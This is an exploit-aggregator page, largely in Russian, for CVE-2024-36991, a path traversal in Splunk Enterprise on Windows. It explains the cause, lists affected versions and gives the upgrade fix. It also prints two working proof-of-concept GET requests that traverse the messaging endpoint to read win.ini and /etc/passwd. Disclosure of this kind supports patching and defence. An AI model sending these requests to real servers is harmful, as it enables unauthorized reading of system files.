Sploitus

Exploit for CVE-2024-36991

kitploit · 2026-09-02

Exploit Code

MARKDOWN40 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MR-XN-CVE-2024-36991
# CVE-2024-36991

> Обход пути в конечной точке «/Modules/Messaging/» в Splunk Enterprise на Windows

В Splunk Enterprise версиях ниже 9.2.2, 9.1.5 и 9.0.10 злоумышленник может выполнить обход пути в конечной точке /modules/messaging/ в Splunk Enterprise на Windows.

Уязвимость существует из-за того, что функция Python os.path.join удаляет букву диска из элементов пути, если диск в элементе совпадает с диском в создаваемом пути.

Эта уязвимость должна затрагивать только Splunk Enterprise на Windows.

# POC

root@kitploit:~
    
    
    GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
    GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
    

# Затронутые версии

  * затронуты версии от 9.2 до 9.2.2

  * затронуты версии от 9.1 до 9.1.5

  * затронуты версии от 9.0 до 9.0.10




# Решение

Обновите Splunk Enterprise до версий 9.2.2, 9.1.5 и 9.0.10 или выше.

# Авторы

Danylo Dmytriiev (DDV_UA)

# Ссылки